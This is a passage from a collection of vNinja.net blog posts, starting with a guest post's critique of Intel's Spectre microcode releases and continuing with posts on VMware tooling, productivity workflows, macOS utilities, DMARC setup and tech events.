fixes. Worse, it seems like the unofficial bundle is only partially fixing variant #2/Spectre. It is obvious that Intel made some last minute changes to microcode and failed to notify partners. What changes has been made between update bundle 20171215 and 20180108? Are we installing incomplete non-released microcode to millions of computers? Only Intel knows! It might be as simple as an effort to include some minor fixes now what everyone with an Intel processor have to update their computer, or it can be a monumental error where many computers are still partially vulnerable to Spectre even with patches installed. With the “security first” pledge from CEO Brian Krzanich promising transparency I expect and demand an explanation from Intel. How is it that VMware, HPE and DellEMC can ship pre-release microcode to millions of computers? Intel microcode update bundle pre-release 15. December +-------+--------------------------+---------+------------+---------+---------+----------+----------+--------+ | CPUID | Platform | Version | Date | Release | Size | Checksum | Offset | Latest | | 50654 | B7 [0, 1, 2, 4, 5, 7] | 200003A | 2017-11-21 | PRD | 0x6C00 | C088D252 | 0x64400 | Yes | | 806E9 | C0 [6, 7] | 7C | 2017-12-03 | PRD | 0x18000 | 5C75A5FE | 0x8B000 | No | | 806EA | C0 [6, 7] | 7C | 2017-12-03 | PRD | 0x17C00 | B81BC926 | 0xA3000 | Yes | | 906E9 | 2A [1, 3, 5] | 7C | 2017-12-03 | PRD | 0x18000 | 6CF72404 | 0xBAC00 | No | | 906EA | 22 [1, 5] | 7C | 2017-12-03 | PRD | 0x17800 | 55695D1F | 0xD2C00 | Yes | | 906EB | 02 [1] | 7C | 2017-12-03 | PRD | 0x18000 | 5046D998 | 0xEA400 | Yes | +-------+--------------------------+---------+------------+---------+---------+----------+----------+--------+ Intel microcode update bundle released 8. january +-------+--------------------------+---------+------------+---------+---------+----------+----------+--------+ | CPUID | Platform | Version | Date | Release | Size | Checksum | Offset | Latest | +-------+--------------------------+---------+------------+---------+---------+----------+----------+--------+ | 50654 | B7 [0, 1, 2, 4, 5, 7] | 200003C | 2017-12-08 | PRD | 0x6C00 | A4059069 | 0x0 | Yes | | 806E9 | C0 [6, 7] | 80 | 2018-01-04 | PRD | 0x18000 | 6961A256 | 0x0 | Yes | | 806EA | C0 [6, 7] | 80 | 2018-01-04 | PRD | 0x18000 | F6263DAE | 0x0 | Yes | | 906E9 | 2A [1, 3, 5] | 80 | 2018-01-04 | PRD | 0x18000 | 6AA1DE93 | 0x0 | Yes | | 906EA | 22 [1, 5] | 80 | 2018-01-04 | PRD | 0x17C00 | 84CABC68 | 0x0 | Yes | | 906EB | 02 [1] | 80 | 2018-01-04 | PRD | 0x18000 | D24EDB7F | 0x0 | Yes | +-------+--------------------------+---------+------------+---------+---------+----------+----------+--------+ Note that all updates are labeled PRD for production. If we take the VMware matrix and mark the recalled microcode in yellow and the potential pre-release in red, we get a pretty depressing chart: The same versions was also shipped in Dell BIOS updates. Thanks to Dell engineering for actually listing the microcode updates, I have not seen the same transparency from other vendors. HPE take note! R740/R740xd/R640/R940/7920R Updated the Intel Xeon Processor Scalable Family Processor Microcode to version 0x3A. R830 Updated the Xeon Processor E5-2600 v3 Product Family Processor Microcode to version 0x3B Updated the Intel Xeon Processor E5-2600 v4 Product Family Processor Microcode to version 0x0b000025 R630/R730/R730XD Updated the Xeon Processor E5-2600 v3 Product Family Processor Microcode to version 0x3B Updated the Intel Xeon Processor E5-2600 v4 Product Family Processor Microcode to version 0x0b000025 R930 Updated the Intel Xeon processor E7-4800/8800 v3 Product Family Processor Microcode to version 0x10 Updated the Intel Xeon processor E7-4800/8800 v4 Product Family Processor Microcode to version 0x0b000025 The Rx30 updates have now been removed from the Dell web page due to the aforementioned issues, but the R740 update is still there. Should it be recalled as well? Hard to tell, I think an update from Intel is in order. I have not been able to attempt to load the new microcode on a server to confirm that it actually would apply, but I tested on my Precision 5520 laptop that use a Xeon E3-1505M v6 processor with the help of the VMware microcode update driver for Windows and the microcode will update from 7C to 80: Some advice # So what is a system administrator to do? My advice is to wait it out. The situation is still fluid and changes almost on a daily basis. Let the dust settle and hope for some more clarity in the coming week. Remember that microcode updates are only for Spectre variant #2 vulnerability which is the hardest to exploit. If you already started patching vSphere, consider a rollback or implement the workaround from VMware. Focus on patching Meltdown on soft targets such as laptops. These devices are much more likely to be running untrusted code. Dont forget applications, especially browsers. Researchers has been able to exploit meltdown and read non-cached data. The hackers can not be far behind. Combining Meltdown with a remote exploit could be disastrous. https://twitter.com/aionescu/status/952014225714511872 As everything except Rasberry Pi is vulnerable to Spectre, focus on mobiles and tablets. Map you vulnerable devices and vendor updates. Pace yourself, we will be fighting this for years to come. There will be more side-channel vulnerabilities in the future and this is not the last round of patching. Keep in mind that there are no microcode updates for Sandy Bridge processors yet. This is why Dell and HPE is holding back updates for Poweredge G12 servers and Proliant Gen8 servers. If you have a lot of Xeon 4600/2600/1600/1400/1200 V1 servers, you will have to wait on Intel and server vendors if you want full mitigation for Spectre. --- # The Curious Case of the Intel Microcode URL: https://vNinja.net/news/the-curious-case-of-the-intel-microcode/ Date: 2018-01-09 Author: Tags: Analysis, Intel, Meltdown, Security, Spectre This guest post by Bjørn Anders Jørgensen, Senior Systems Consultant Basefarm, first appeared on LinkedIn. Disclaimer: This is a report based on current development as of 7. January, the situation is changing by the hour so read this opinion piece with that in hindsight. Unless you have been living under a rock for the last week you will know by now that there is a universal design flaw in most modern microprocessors, leaving them vulnerable to a serious information disclosure problem that requires updates to all operating systems and processors. If you are not familiar with the issue, start here: Meltdown and Spectre Jan Wildeboer also has a comprehensive timeline: How we got to #Spectre and #Meltdown A Timeline The issue has been known by Intel at least since June, and has been under embargo while everyone has been hammering out code to mitigate the threat and be ready when the embargo was lifted. So we have three vulnerabilities, one that requires microcode update: CVE-2017-5715 (variant #2/Spectre) aka branch target injection Microcode is a small piece of code that can be loaded by the processor at boot time, either from the BIOS or from the operating system. Intel has been using this method for more than a decade to solve bugs and issues. It is a well known process. All HW vendors ships regular BIOS updates containing microcode updates and most modern operating systems has facilities to distribute and deploy microcode updates. This includes Linux, Windows and ESXi server. While most Linux distros keep an updated microcode repository, Microsoft and VMware has occasionally added microcode updates for serious issues. So with everything blowing up this week, you’d think Intel would prepare microcode updates and ensure that OS patches contained the updated microcode so that you were completely secure from the know vulnerabilities. (more on the unknowns later) No! We all have to wait for the HW vendors to release updated BIOS for all our computers. They are of course completely overloaded and will prioritize new models. Currently (7. Jan) on the server side, Dell has pretty good coverage for 13G and 14G servers and HPE has pretty good coverage for 9G and 10G servers. Anything older than 3 years are still vulnerable even after patching the OS/hypervisor. On the consumer side, it is all over the place. Disclaimer: The Register claims that variant #2/Spectre only requires microcode updates for Skylake and newer microarchitecture, in which case the tier 1 vendors already have good coverage, but the tier 2 and tier 3 vendors will lag for months. Even Cisco is not planning BIOS updates until 14. February! Intel is as normal very, very quiet regarding microcode updates. They usually come with no or little release notes, and is basically treated like a black box, even though it becomes an integral part, changing critical functions in the CPU. The only content I’ve found was from an updated Debian bug report: New upstream microcodes to partially address CVE-2017-5715 + Updated Microcodes: sig 0x000306c3, pf_mask 0x32, 2017-11-20, rev 0x0023, size 23552 sig 0x000306d4, pf_mask 0xc0, 2017-11-17, rev 0x0028, size 18432 sig 0x000306f2, pf_mask 0x6f, 2017-11-17, rev 0x003b, size 33792 sig 0x00040651, pf_mask 0x72, 2017-11-20, rev 0x0021, size 22528 sig 0x000406e3, pf_mask 0xc0, 2017-11-16, rev 0x00c2, size 99328 sig 0x000406f1, pf_mask 0xef, 2017-11-18, rev 0xb000025, size 27648 sig 0x00050654, pf_mask 0xb7, 2017-11-21, rev 0x200003a, size 27648 sig 0x000506c9, pf_mask 0x03, 2017-11-22, rev 0x002e, size 16384 sig 0x000806e9, pf_mask 0xc0, 2017-12-03, rev 0x007c, size 98304 sig 0x000906e9, pf_mask 0x2a, 2017-12-03, rev 0x007c, size 98304 * Implements IBRS and IBPB support via new MSR (Spectre variant 2 mitigation, indirect branches). Support is exposed through cpuid(7).EDX. * LFENCE terminates all previous instructions (Spectre variant 2 mitigation, conditional branches). Note the use of “partially”. We’ll get back to that in a minute. Breaking open the package, the changelog says: "unofficial bundle with CVE-2017-5715 mitigation" So with six months lead time Intel has not been able to release an official microcode bundle update. The latest official one is from 17. November and does not seem to contain any Spectre fixes. Worse, it seems like the unofficial bundle is only partially fixing variant #2/Spectre. Why is it that Intel is not using the tried and tested OS microcode update method to resolve what is arguably one of the most serious IT security issues in history? It could easily be included with the patch sets for the major OS vendors, like for Debian and other Linux distros. It has been done for VMware ESXi server and Microsoft Windows for less serious issues. And with the microcode revision that “partially address CVE-2017-5715” matching what the server vendors are releasing, do we have more updates coming? Intel really needs to get a grip on this. These kind of side channel attacks are a completely new vulnerability category, and now that researchers are focusing on this, there will be more coming. As Anders Fogh said in a early blog post: "While I did set out to read kernel mode without privileges and that produced a negative result, I do feel like I opened a Pandora’s box. " So we have possibly a partial patch currently and most likely new vulnerabilities coming down the road, I absolutely implore Intel to get a grip and prepare for a quick microcode update and distribution. There is no way that the server vendors will be able to release another BIOS update for a huge amount of servers. **The only sensible way is to use the OS update mechanism, even though that is not persistent and could potentially be tampered with. **And please, we need full disclosure. I suspect a lot of people believe they have resolved the vulnerability, while in fact they have not. For virtual machines there are more steps required for the VM to enable the patch. More on that in a follow up post. Note: We do have some unofficial Intel microcode repositories by BIOS modders and enthusiasts. While I applaud the effort and work, it really should not be necessary, and while the microcode is signed by Intel, modifying the inner workings of the CPU opens for absolutely undetectable persistent hacks and should only come from an official source. --- # Evaluating 2017 URL: https://vNinja.net/misc/evaluating-2017/ Date: 2017-12-18 Author: christian Tags: 2017, Review Keeping up with tradition (you thought I was going to say Kardashians there, didn’t you?), it’s time to evaluate 2017. My list of goals for 2017 and the verdict is as follows: Get that VCAP6-DCV Design exam out of the way. Done and dusted (for 6.5 that is, not 6.0). I’ve also updated my VCP to 6.5, and I’m currently waiting for the VCAP6.5-DCV Deploy exam. Score: 10/10 AWS Associate Certifications Didn’t happen. Haven’t done any of these, nor really studied for any of them (yet). Other certifications or time sinks have completely eradicated these. Score: 0/10 Learn something new This one is hard to gauge, but 2017 has definitely been a learning experience in many ways. Not all that much tangible and measurable items here, bit I’ll still rate it as medium. This category needs to be easier to assess for 2017. Score: 5/10 Attend an industry conference VMworld 2017 in Barcelona was awesome, as I expected. Score: 10/10 vNinja.net **Well, the In The Bag series didn’t last that long, which was one of the main goals. I have kept posting whenever I feel like it, without any pressure, and in total I’ve posted more in 2017 than I did in 2016. I have a theory as to why there isn’t as much technical VMware posts though, but I’ll keep that as a separate post for later. All in all, not bad. Score: 5/10 Photography I’m still not really happy with the amount of photography done in 2017, but I’m really happy with a few of the shots I did manage to take and publish. Huge improvement from 2016. Score: 8/10 As far as my more “soft” goals for 2017: I need to get better at planning things out — I think I’ve managed to do this, to a degree. I’ve become much better at breaking larger tasks into smaller ones, and follow them through. Productivity is always an ongoing process, but I notice that compared to many I interact with, I seem to have a better grasp of the tasks I need to complete, and don’t forget nearly as much as I used to do. It’s an ongoing process, but I’m definitely moving in the right direction. Clearer focus — Close correlation to the point above, but I’ve improved in this area as well. Get more sleep — I still sleep less than I think I should, but it’s better than it has been for years. All in all that gives me a personal score of 38 of a possible 60. Not quite what I wanted, but it’s an improvement of the 28 rating for 2016. One of the major categories did get a 0/10, which really puts a dent in the score. I should have put in a general certification category instead, that would have helped bring the score up as I did a few ones I didn’t plan on initially. All in all, 2017 has been pretty good both professionally and personally. Now it’s time to breathe, relax and make sure 2018 will be even better. --- # Nordic VMUG Conference 2018 URL: https://vNinja.net/news/nordic-vmug-conference-2018/ Date: 2017-12-13 Author: christian Tags: Awsome, conference, Denmark, VMUG My good friends, and fellow VMUGgers, in Denmark is once again arranging the largest VMUG event in the Nordics in January 2018. The Nordic VMUG Conference promises to be just as awesome as previous versions, just have a look at this speaker list: Opening Keynote: Kit Colbert Breakout sessions: Ole Agesen, Duncan Epping, Myles Gray, Frank Denneman, Niels Hagoort, Grant Orchard and Joerg Lew Closing Keynote: Ken Westin Community Sessions: Michael Armstrong - A sneak peak behind the scenes of running the VMworld Hands On Labs Steffen Christensen - From The Field: Most Common vRA/vRO Use Cases from The Real World. Thomas Poppelgaard - Horizon in Azure all you need to know Johan van Amersfoort - VMware Workspace ONE: How to secure a workplace without consessions? Jacob Styrup Bang - A bottom up presentation of Aarhus University’s new SDDC. Michael Monberg - Tips & Tricks in vRops Mads Fog Albrechtslund - Create scalable and reusable code in vRealize Orchestrator Stefan Pahrmann - NSX micro segmenting in the real World Simon Eady - Roundtable: vROps Clinic / Workshop — Come and discuss all things vROps. Design, Alerts, policies etc. Startup Session: Per Buer - IncludeOS In addition to the incredible list of speakers, the Danish VMUG has reserved the whole of the Fields movie theater, for this all-day event which promises to be full-on awesome in every way. Reserve January 11th, and register now! I can guarantee you won’t regret it! # --- # Scott Hanselman - "It's not what you read, it's what you ignore" URL: https://vNinja.net/awesometalks/scott-hanselman-its-not-what-you-read-its-what-you-ignore/ Date: 2017-11-27 Author: christian Tags: This is the second recorded talk published in the Awesome Talks series. This time it’s Scott Hanselman’s “It’s not what you read, it’s what you ignore” talk from Dev Day in Kraków way back in 2012. This isn’t a technical talk, it’s originally geared towards developers but Scott’s message should resonate with everyone in the tech field. In general, it’s about how you can deal with large amounts of information. Lot’s of great takeaways here! Enjoy! BTW: Hey, Scott did not suck that much. --- # macOS: Vanilla URL: https://vNinja.net/osx/macos-vanilla/ Date: 2017-11-24 Author: christian Tags: Small, unobtrusive and easy to use. That’s a pretty good description for a macOS utility I recently discovered: Vanilla (non-affiliate link). Simply put, this little gem let’s you hide any or all menu bar icons in macOS, while still keeping them easily accessible behind a small arrow: After hiding with Vanilla: Expanded view: I for one like getting rid of the unnecessary clutter! --- # LISA17 - "Don't You Know Who I Am?!" The Danger of Celebrity in Tech URL: https://vNinja.net/awesometalks/lisa17-dont-you-know-who-i-am-the-danger-of-celebrity-in-tech/ Date: 2017-11-22 Author: christian Tags: This is the first post, in what hopefully will turn into a series of posts, highlighting awesome talks that are freely available. There is a lot of great content out there, both inspirational and funny, and I’ll try to publish my favorites when I find them. So here is the first one! John Nicholson shared this awesome talk by Corey Quinn from LISA17, which should be mandatory for anyone attending conferences, or talks in general. Not only does it dive into the culture of asking questions when attending a talk, but also has lots of good information for speakers as well. Trust me, this is ~44 minutes very well spent. --- # Webinar: Veeam integration with VMware vSAN, vSphere tags and SPBM policies URL: https://vNinja.net/virtualization/webinar-veeam-integration-with-vmware-vsan-vsphere-tags-and-spbm-policies/ Date: 2017-11-13 Author: christian Tags: Self Promotion, Veeam, Webinar Warning: Shameless self promotion ahead! November 30th I’ll be joining Martin Plesner-Jacobsen from Veeam for a Live Webinar: _Veeam integration with VMware vSAN, vSphere tags and SPBM policies. _ Now that’s a lot of goodies in one place! [ ](https://go.veeam.com/webinar-integration-vmware-vsan-vsphere-spbm-policies?ccode=blogger_Christian Mohn_q042017) Click on the banner above to [register now](https://go.veeam.com/webinar-integration-vmware-vsan-vsphere-spbm-policies?ccode=blogger_Christian Mohn_q042017), and reserve your spot! --- # Mass Converting .svg to .png on macOS URL: https://vNinja.net/osx/mass-converting-svg-to-png-on-macos/ Date: 2017-10-26 Author: christian Tags: Blogtober, HomeBrew, macOS When playing around with Royal TSX I needed to mass convert the VMware Clarity .svg files to .png files that I could use as icons in Royal TSX. After trying a series of different approaches, I ended up with using rsvg-convert from libRSVG. In order to get rsvg-convert installed on my MacBook, I turned to HomeBrew. HomeBrew, which calls itself **The missing package manager for macOS **is in my opinion essential for any macOS user. If you are missing a command or utility, chances are that HomeBrew has you covered. Mass Converting # Once you have HomeBrew installed, you’re pretty much ready to go by running the following command in Terminal: brew install librsvg This installs the libRSVG formulae, and all it’s dependencies, and makes rsvg-convert available. Once libRSVG installed locally, you can mass-convert .svg files by running the following command in your terminal of choice. for i in *; do rsvg-convert $i -o `echo $i | sed -e 's/svg$/png/'`; done This loops through every .svg file in the current directory, and creates .png versions of them, for usage elsewhere. --- # Integrating Pocket with Todoist via IFTTT URL: https://vNinja.net/workflow/integrating-pocket-with-todoist-via-ifttt/ Date: 2017-10-24 Author: christian Tags: IFTTT, Pocket, Todoist, Workflow Myles Gray asked me how I integrate Pocket with Todoist, after my How I use Todoist post, and the answer is very simple: IFTTT. If-This-Then-That lets you connect services, and create rules (or applets) that trigger based on events in those services, luckily both Todoist and Pocket are supported. Now, there is a bit of overlap between how I use Pocket and Todoist, but I mainly use Pocket to keep track of links I want to either read later, or use as basis for blog posts. Photo by Kari Shea on Unsplash I have two main IFTTT recipes that takes care of my integration between the two. Both of these use Pocket as the source, and Todoist as the target, I do not transfer anything from Todoist to Pocket. IFFT Applets: # “If new item tagged read, then create a task in To Read” Simply put, if I tag something with the tag read in Pocket, it gets added to my “To Read” sub-project in Todoist. This allows me to quickly move a Pocket item into Todoist as an action item, with the complete URL. It does not assign a label, nor does it set a priority—but it allows me to have a nice link list in Todoist with items I want read later. Of course, the Todoist Chrome extension allows me to do similar things, but only from the browser. Since I use IFTTT to add my Twitter likes to Pocket etc, it makes sense to have most of that collected in one place for further investigation. “If new item tagged todo, then create a task in Inbox” Similar to the one above, just with the todo tag instead. Naturally those links get placed in my “To Do” project instead. The difference here is that those that go into my To Do project, are things that I want to actively do something with (besides reading). That might be create a blog post based on something, send it to a client or coworker, or similar tasks. Workflow # For me, Pocket works as a first repository of content I want to check out, and the content I want to do something further with, they live in Todoist. Once they are in Tooist, it’s trival to move them over to the correct projects and/or labels for organizing. I have also set up a recurring task, with mobile alerts, to make sure I check my Pocket-lint at least once a week. I’m sure there are other, and more fancy ways of doing this, or even improve on them. Please leave a comment if you do something similar, or something that I haven’t even thought of at all. --- # How I use Todoist URL: https://vNinja.net/workflow/how-i-use-todoist/ Date: 2017-10-24 Author: christian Tags: Blogtober, Todo, Todoist, Work, Workflow As I’ve mentioned before, I use Todoist to keep track of my personal to-do list. This is the first to-do manager I’ve been able to stick with, and I’ve been using it daily for well over 2 years now. In that two year period I’ve reorganised it a bit, but for the most part I’ve been able to keep to the main structure I initially created when setting it up the first time. Photo by Glenn Carstens-Peters Projects # I try to keep my projects organised in main projects, with sub-projects as needed. All items I add should fall into one of these high-level projects. I have the following main projects defined. Work Private VMUG vNinja Most, of not all of these are self-explanatory. Anything Work related goes into Work, and anything Private naturally goes into Private. Most of these have sub-projects as well, like Work which has sub-projects for my employer, and sub-projects for each of my clients. Labels # In addition to Projects, Todoist also features Labels than you can apply to a task, regardless of which project it is (thing of this as tags). My current list of labels are: @Waiting — Anything that I’m currently waiting for someone else to to something with before I can continue. @Writing — Things I’m planning on writing. @Someday — Something I plan on doing at some point, but haven’t set a deadline for. @Read — Things I’m planning on reading. Priorities # P1 — Important and urgent. Do these now. P2 — Important but not urgent. Must have a due date. Move to P1 on or before due date. P3 — Not important but urgent. Delegate to others, or change priority to P2 or P4. P4 — Not important and not urgent. Only do if time permits. No due date. This is based on the Eisenhower Method, and makes it easy to figure out which tasks I should prioritize at any given time. These tie in to the Todoist priorities as well, so I can use both filters In addition this, I have the Todoist app on my phone, and run the Todoist extension in Chrome as well to capture web pages to my @Read list. This is also used in combination with Pocket. I have recurring tasks every day, with mobile notification, to make sure I check Todoist regularly. After all, I don’t want to lose my Todoist Karma! So far I’ve completed 2850 tasks in Todoist, giving me the Karma level of Grandmaster! For any GTD aficionados out there, you can clearly see that I don’t follow that structure. GTD in itself is probably awesome, if you’re able to stick with it. For me though, GTD takes to much of an effort in organising tasks and projects, so I’ve created a system that works for me. How do you use your task manager to keep track of your todo items? --- # VeeamOn Tour Virtual 2017 - Reserve your spot! URL: https://vNinja.net/virtualization/veeamon-tour-virtual-2017-reserve-your-spot/ Date: 2017-10-17 Author: christian Tags: event, Veeam Veeam is hosting their VeeamOn Tour Virtual 2017 event on December 5th, and I’ll be part of the panel of bloggers in the Expert Lounge! Veeam describes the event like this: The biggest online Availability event in EMEA — VeeamON Tour Virtual 2017 — is once again coming to your desktop! No need to leave your chair — Experience Availability simply by joining us for an ultimate digital journey! VeeamON Tour Virtual runs from 11 am to 5 pm CET, and offers three separate tracks; Business, Technical and Cloud. **Check out the agenda and sign up for this free event now, find me in the Expert Lounge, and get your Veeam-on! ** --- # Making Royal TSX Even More Awesome URL: https://vNinja.net/osx/making-royal-tsx-even-more-awesome/ Date: 2017-10-11 Author: christian Tags: Awesome, Blogtober, management, RoyalTSX, Software For those who don’t know, Royal TSX is an awesome Remote Management solution, which supports RDP, VNC, SSH, S/FTP and even ESXi and vCenter. I’ve been using it for years, not just because they offer free licenses for vExperts (and others), but simply because it works really well. Store it’s config file on a synchronized file area (like Dropbox), and boom, your config follows you around from machine to machine, including custom icons. What’s not to like? Following Ryan Johnson’s tweet, where he showed off his VMware Clarity inspired Royal TSX setup, I decided to do something similar. Unlike Ryan, I decided to run with the standard Clarity icons, and not invert them. Since the Clarity icons are in .svg format, I had to convert them to .png to be able to use them as icons in Royal TSX, I’ll post a separate post on how I batch converted them later. Currently, my setup looks like this # Royal TSX with Clarity icons Changing the icons for entries is pretty straight forward. For existing entries in your config file, simply open the items properties and click on the small icon besides the Display Name. This brings up a dialog showing the built-in icons, but also reveals an option to browse your filesystem for a new icon to use. Update: Felix from Royal Applications left a nice comment, explaining that you can also drag-and-drop icons directory from finder into Royal TSX as well as the manual process described above. To change the default icons, find Default Settings in the Navigation Panel on the left, and follow the same procedure. While the primary goal was to prettify my setup with snazzy new icons, I discovered that I could do quite a few things besides that as well. As seen in the screenshot, there are a couple of web pages added, but perhaps more interesting are the “PowerCLI” and “Connect VPN” entries. Running PowerCLI Core from Royal TSX # I run the PowerCLI Core Docker container on my Macbook from time to time, so why not have the option to run it directly from Royal TSX? Once you have it up and running, adding it as a Command Task is pretty easy! Add a new Command Task, and put in the docker run command in the Command: field Update: Since originally posting, I’ve discovered that there is an even better ways of doing this, and at the same time keep your PowerCLI running in a tab inside of Royal TSX. Instead of adding it as a Command Task, add a new Terminal connection, but use Custom Terminal as the connection type: Then add the command you want to run under Custom Commands In my case, I want to run the following command: `docker run –rm -it –entrypoint=’/usr/bin/powershell’ vmware/powerclicore Now, under “Advanced”, find the Session option. Enable “Run inside login shell” to make sure your applications, like Docker, are found without having to specify the complete path to it, and that’s it. As long as Docker runs locally, PowerCLI core can now be launched directly from the navigation bar, and it opens a new tab inside of Royal TSX! This can also be used to run other things of course, I’ve added a new Terminal option to my sidebar as well, which opens iTerm2 in a new tab. Connecting Tunnelblick VPN Royal TSX # I run OpenVPN at home, and use Tunnelblick as my client of choice. In order to connect to my home network, I’ve created another Command Task, with the “Run in Terminal” option configured, that runs a simple AppleScript command instructing Tunnelblick to connect. osascript -e "tell application \"Tunnelblick\"" -e "connect \"[your-connection-name]\"" -e "end tell" I guess I really understated the percentage of awesomeness increase by doing this, it should at least have been 84% 92,7%. Just did a complete overhaul of my Royal TSX setup. It’s now 78% more awesome. — Christian Mohn™ (@h0bbel) October 11, 2017 --- # PSA: Protect Your Email with DMARC URL: https://vNinja.net/misc/psa-protect-your-email-with-dmarc/ Date: 2017-04-15 Author: christian Tags: dmarc, email, Security In the last few months, I’ve seen an uptick in spoofed emails being sent with my own personal email domain. Not only is this extremely annoying, but more problematic is that recipients receive spam and phishing emails from what seems to be my personal mail account, simply by spoofing the from address. I don’t know why domain and email address has been “chosen” for this, but I guess this is fallout from the LinkedIn breach way back in 2012. I didn’t think there was much I could do about this, but a recent tweet by my friend Per Thorsheim sent me down the rabbit hole. I love my hard-fail SPF & DMARC email policy, and using @dmarcian to see how spammers fail to take advantage of my domain. :D — Per Thorsheim (@thorsheim) April 12, 2017 Special offer for you my friend: Coffee & cake, and I'll show you HOWTO. :-D — Per Thorsheim (@thorsheim) April 12, 2017 So, obviously there are options available to me that I was completely unaware of. I haven’t managed any public facing email services for 6-7 years, so I’ve not kept up with whatever has been happening in that particular space. Also, my personal email domain has been hosted by Google since 2008, so I haven’t really managed that either. Set and forget, right? Well, not quite. So, what is this DMARC thing? It stands for Domain-based Message Authentication, Reporting & Conformance, and is a way to try and validate that emails from a given domain is being sent using one of the valid mail servers configured for that domain. In order to be able to use DMARC, you first need to first have Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configured for you domain. Here are the resources I used to get all of this configured for my domain: Configure SPF records to work with G Suite Authenticate email with DKIM Add a DMARC record Less than 24 hours after configuring everything, I received my first DMARC Aggregate Report which is basically an XML file showing what has been going on. Since this file is a bit hard to read on it’s own, I uploaded it to DMARC Analyzer, and even though I knew a lot of email was being send with my email address as the reply to address, I was quite surprised to see that in less then 24 hours after I set up the DMARC DNS records, **a total of 295 emails had been rejected by mail servers all over the world, most of them sent from mail servers in Vietnam. **I_ do not_ send 295 emails a day with my personal email account, and absolutely none of them from Vietnam. In fact, during the time-frame of this initial aggregate report, I sent zero emails - as seen in the screenshot from the report. I have now configured my DMARC DNS txt records to send emails directly to DMARC Analyzer, and I’m looking forward to seeing how these numbers add up over time. I’m currently on a free trial plan, and looking to evaluate which of the available DMARC Analyzers out there I want to use permanently. At least now receiving email servers have a fighting chance of rejecting fake emails from my domain, since it’s now possible to verify that they are sent through a valid source. Even if you don’t have problems with someone spoofing your email addresses, please spend 10 minutes configuring this for your domain as well. You never know when something like this might occur, and it’s better to build your defences before you get attacked. That way you stand a chance of stopping it before it gets as ugly as it did in my case. And Per, you are a gentleman and a scholar. Even if I did manage to investigate and set this up on my own, cake and coffee is still on me! --- # VMware vSAN 6.6 - What's New for Day 2 Operations? URL: https://vNinja.net/virtualization/vmware-vsan-6-6-whats-new-for-day-2-operations/ Date: 2017-04-11 Author: christian Tags: Day 2, management, News, Operations, VMware, vSAN VMware has just announced vSAN v6.6, with over 20 new features. While new and shiny features are nice I’d like to highlight a couple that I think might be undervalued from release feature-set perspective, but highly valuable in day to day operations of a vSAN environment, otherwise known as Day 2 operations. vSAN Configuration Assist is one such new feature. While it’s true that it helps first time configuration of a greenfield installation with vSAN (no more bootstrapping, yay!), it also helps with Day 2 operations. It helps configure new hosts added to an existing vSAN enabled cluster, but it also makes it possible to automate updating of IO controllers, both firmware and drivers directly from within vCenter. As everyone should know by now, vSAN is highly dependent on drivers and firmware being on supported levels. This improvement helps the improved vSAN Health Check (Enhanced Health Monitoring) alert you when new and _verified _drivers/firmware are available, and if the controller tools are available on the ESXi host, it can also update the firmware for you. Directly from vCenter, utilising maintenance mode like you’re used to from patching your ESXi hosts from VMware Update Manager (even if it’s not integrated into VUM at this point). This new features takes the vSAN HCL list to a new level, it’s no longer just a list over supported IO controllers and their firmware and drivers, it’s a now also a software distribution point. At the moment Dell EMC, Fujitsu, Lenovo and SuperMicro are all supported vendors for this new distribution model, hopefully the rest will follow suit quickly. The second feature I would like to highlight as a Day 2 operations enhancement, is the new vSAN Cloud Analytics feature. If you participate, in the Customer Experience Improvement Program (CEIP), it will enable custom alerting for your environment, based on your own environment. For instance, if a new Knowledge Base article is published, that pertain to your specific setup, it will alert you about it. One example might be if you have Intel X710 NICs, which can cause PSODs — Wouldn’t it be nice if you got alerted that this might be an issue, and then told how to remediate it? Well, with vSAN 6.6 you’ll get exactly that. With vSAN 6.6 you get both automated, and verified, firmware/driver upgrades, as well as proactive alerting for potential issues through the hive-mind that is the analytics service. This is what VMware calls **Intelligent Operations and Lifecycle Management **in this release, and it’s really hard to argue with that. Of course, vSAN 6.6 provide other Day 2 Operations enhancements as well, like Degraded Device Handling (DDH), Simplified Stretched Cluster Witness replacement procedures, Capacity and Policy Pre-Checks and access to the vSAN control plane trough the ESXi Host Client, but I’ll leave those for later posts. --- # Cross vCenter VM Mobility Fling - macOS? URL: https://vNinja.net/vmware-2/cross-vcenter-vm-mobility-fling-macos/ Date: 2017-03-28 Author: christian Tags: Awesome, Fling, macOS, VMware, xvMotion The VMware Cross vCenter VM Mobility - CLI was recently updated so I decided to try it out. In short, this little Java based application allows you to easily move or clone VMs between disparate vCenter environments. The Fling is listed with the following requirements: JDK 1.7 or above Two vCenter instances with ESX 6.0 Windows : Windows Server 2003 or above Linux : RHEL 7.x or above, Ubuntu 11.04 or above There is no mention of macOS there, but I decided to give it a go any way, and i**t turns out that it works just fine on macOS as well! **Just make sure you have the Java JDK installed locally. When I ran it the first time, I got the following error, since the JAVA_HOME environment variable was not set. ~/Downloads/xvc-mobility-cli_1.2$ sh xvc-mobility.sh set JAVA_HOME to continue the operation This is very easy to fix, just run the following command in your terminal of choice, and xvc-mobility.sh should work just fine on your Mac. export JAVA_HOME=$(/usr/libexec/java_home) Next up is running the fling with the correct parameters (this is a clone operation, not a relocate): ~/Downloads/xvc-mobility-cli_1.2$ sh xvc-mobility.sh -svc [source-vcenter] -su [source-vcenter-username] -dvc [destination-vcenter] -du [destination-vcenter-username] -vms [vm-name] -dh [destination-host] -dds [destination-datastore] -op clone -cln [destination-vm-name] ... 13:41:40.591 [main] INFO com.vmware.sdkclient.vim.Task - CloneVM_Task | State = SUCCESS | Error = null | Result = com.vmware.vc.ManagedObjectReference@d9a221a7 13:41:40.597 [main] INFO com.vmware.sdkclient.vim.Task - Monitor task end 13:41:40.597 [main] INFO com.vmware.sdkclient.vim.Task - CloneVM_Task took : 0:51:33.728 13:41:40.603 [main] INFO c.v.s.helpers.CrossVcProvHelper - Successfully cloned the vm:[destination-vm-name] I was able to clone a VM from my lab in Bergen to my lab in Oslo, without any problems what-so-ever. Not only is that a Cross vCenter vMotion, but also a Cross Country one, awesome! Now this is just an example, please check the official documentation for all the parameters, and what the tool expects. --- # In The Bag #13 - Week 11 2017 URL: https://vNinja.net/inthebag/in-the-bag-13-week-11-2017/ Date: 2017-03-17 Author: christian Tags: InTheBag, News, Weekly Welcome to the thirteenth edition of _In The Bag! # Photo by Patrick Lindenberg In The Bag #13 - Week 11 2017 # Technology # In-Guest UNMAP Fix in ESXi 6.5 Part I: Window (http://www.codyhosterman.com/2017/03/in-guest-unmap-fix-in-esxi-6-5-patch-1/)& Part II: Linux Cody Hosterman 